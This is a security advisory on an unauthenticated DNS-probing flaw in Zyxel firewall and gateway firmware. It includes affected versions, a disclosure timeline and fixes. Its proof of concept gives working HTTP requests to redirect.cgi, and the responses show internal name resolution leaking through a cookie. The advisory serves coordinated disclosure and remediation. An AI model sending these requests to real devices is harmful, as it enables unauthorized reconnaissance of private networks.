Share
SEC Consult Vulnerability Lab Security Advisory < 20190829-1 >  
=======================================================================  
title: External DNS Requests  
product: Zyxel USG/UAG/ATP/VPN/NXC series  
vulnerable version: see "Vulnerable / tested version"  
fixed version: see "Solution"  
CVE number: -  
impact: medium  
homepage: https://www.zyxel.com  
found: 2019-06-19  
by: Thomas Weber (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Europe | Asia | North America  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has  
been connecting people to the internet for nearly 30 years. We keep promoting  
creativity which meets the needs of customers. This spirit has never been  
changed since we developed the world's first integrated 3-in-1 data/fax/voice  
modem in 1992. Our ability to adapt and innovate with networking technology  
places us at the forefront of understanding connectivity for telco/service  
providers, businesses and home users.  
  
We're building the networks of tomorrow, helping unlock the world's potential  
and meeting the needs of the modern workplace; powering people at work, life  
and play. We stand side-by-side with our customers and partners to share new  
approaches to networking that will unleash their abilities. Loyal friend,  
powerful ally, reliable resource โ€” we are Zyxel, Your Networking Ally."  
  
Source: https://www.zyxel.com/about_zyxel/company_overview.shtml  
  
  
  
Business recommendation:  
------------------------  
SEC Consult recommends Zyxel customers to upgrade the firmware to the latest  
version available. A thorough security review should be performed by security  
professionals to identify further potential security issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Information Disclosure via Unauthenticated External DNS Requests  
A DNS request can be made by an unauthenticated attacker to either spam a DNS  
service of a third party with requests that have a spoofed origin or probe  
whether domain names are present on the internal network behind the firewall.  
  
  
Proof of concept:  
-----------------  
1) Information Disclosure via Unauthenticated External DNS Requests  
By sending the following POST request an attacker can probe for the domain  
"subdomain.domain.com":  
-------------------------------------------------------------------------------  
POST /redirect.cgi?original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1  
Host: 192.168.1.1  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8  
Connection: close  
Cache-Control: max-age=0  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 16  
  
arip=subdomain.domain.com  
-------------------------------------------------------------------------------  
  
The following GET request can be used for the same purpose:  
-------------------------------------------------------------------------------  
GET /redirect.cgi?arip=subdomain.domain.com&original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1  
Host: 192.168.1.1  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8  
Connection: close  
Cache-Control: max-age=0  
-------------------------------------------------------------------------------  
  
If the domain can be resolved, the response contains the resolved IP address  
within the cookie value:  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Date: Mon, 24 Jun 2019 08:14:33 GMT  
Cache-Control: no-cache, private  
Pragma: no-cache  
Expires: Mon, 16 Apr 1973 13:10:00 GMT  
Set-Cookie: arip=<IP-of-subdomain.domain.com>; path=/  
Set-Cookie: zy_pc_browser=1; path=/  
Connection: close  
Content-Type: text/html  
Content-Length: 9099  
  
[...]  
-------------------------------------------------------------------------------  
  
If the domain cannot be resolved, a redirection will be returned:  
-------------------------------------------------------------------------------  
HTTP/1.1 302 Found  
Date: Mon, 24 Jun 2019 08:11:57 GMT  
Location: ext-js/app/view/login/useraware.html  
Content-Length: 220  
Connection: close  
Content-Type: text/html; charset=iso-8859-1  
  
[...]  
-------------------------------------------------------------------------------  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following versions have been tested, other versions might be affected as  
well:  
Zyxel USG110 ZLD 4.33  
Zyxel USG210 ZLD 4.33  
Zyxel USG310 ZLD 4.33  
Zyxel USG1100 ZLD 4.33  
Zyxel USG1900 ZLD 4.33  
Zyxel USG2200-VPN ZLD 4.33  
Zyxel UAG2100 ZLD 4.18  
Zyxel UAG4100 ZLD 4.18  
  
The vendor provided the following list of affected devices:  
Zyxel ATP200 ZLD4.33 patch 1 and earlier  
Zyxel ATP500 ZLD4.33 patch 1 and earlier  
Zyxel ATP800 ZLD4.33 patch 1 and earlier  
Zyxel UAG2100 4.18 patch 1 and earlier  
Zyxel UAG4100 4.18 patch 1 and earlier  
Zyxel VPN50 SD-OS 10.02 and earlier  
Zyxel VPN100 SD-OS 10.02 and earlier  
Zyxel VPN300 SD-OS 10.02 and earlier  
Zyxel USG20-VPN ZLD4.33 and earlier  
Zyxel USG20W-VPN ZLD4.33 and earlier  
Zyxel USG40 ZLD4.33 and earlier  
Zyxel USG40W ZLD4.33 and earlier  
Zyxel USG60 ZLD4.33 and earlier  
Zyxel USG60W ZLD4.33 and earlier  
Zyxel USG110 ZLD4.33 and earlier  
Zyxel USG210 ZLD4.33 and earlier  
Zyxel USG310 ZLD4.33 and earlier  
Zyxel USG1100 ZLD4.33 and earlier  
Zyxel USG1900 ZLD4.33 and earlier  
Zyxel USG2200 ZLD4.33 and earlier  
Zyxel NXC2500 5.40 and earlier  
Zyxel NXC5500 5.40 and earlier  
-------------------------------------------------------------------------------  
  
  
Vendor contact timeline:  
------------------------  
2019-06-26: Contacting vendor through security@zyxel.com.tw.  
2019-06-27: Vendor changed PGP key. Sent advisory with new key. Vendor  
confirmed receipt.  
2019-07-03: Asked for an update; Vendor told that they just finished their  
investigation.  
2019-07-09: Vendor provided a full list of devices that are prone to this  
vulnerability.  
2019-07-23: Asked for a timeline; Vendor asked to shift the release of the  
advisory to 2019-08-29 in order to provide fixes; Shifted advisory  
release to this date.  
2019-08-26: Asked for a status update; Vendor told that fixes are ready to be  
published at 2019-08-29.  
2019-08-29: Coordinated advisory release.  
  
  
Solution:  
---------  
Install the newest firmware for your device from the vendor's website  
to fix this issue:  
  
https://www.zyxel.com/support/download_landing.shtml  
  
Additionally, the vendor provides the following security notice:  
https://www.zyxel.com/support/web-CGI-vulnerability-of-gateways-and-access-point-controllers.shtml  
  
  
Workaround:  
-----------  
Restrict network access to the web interface.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF T.Weber / @2019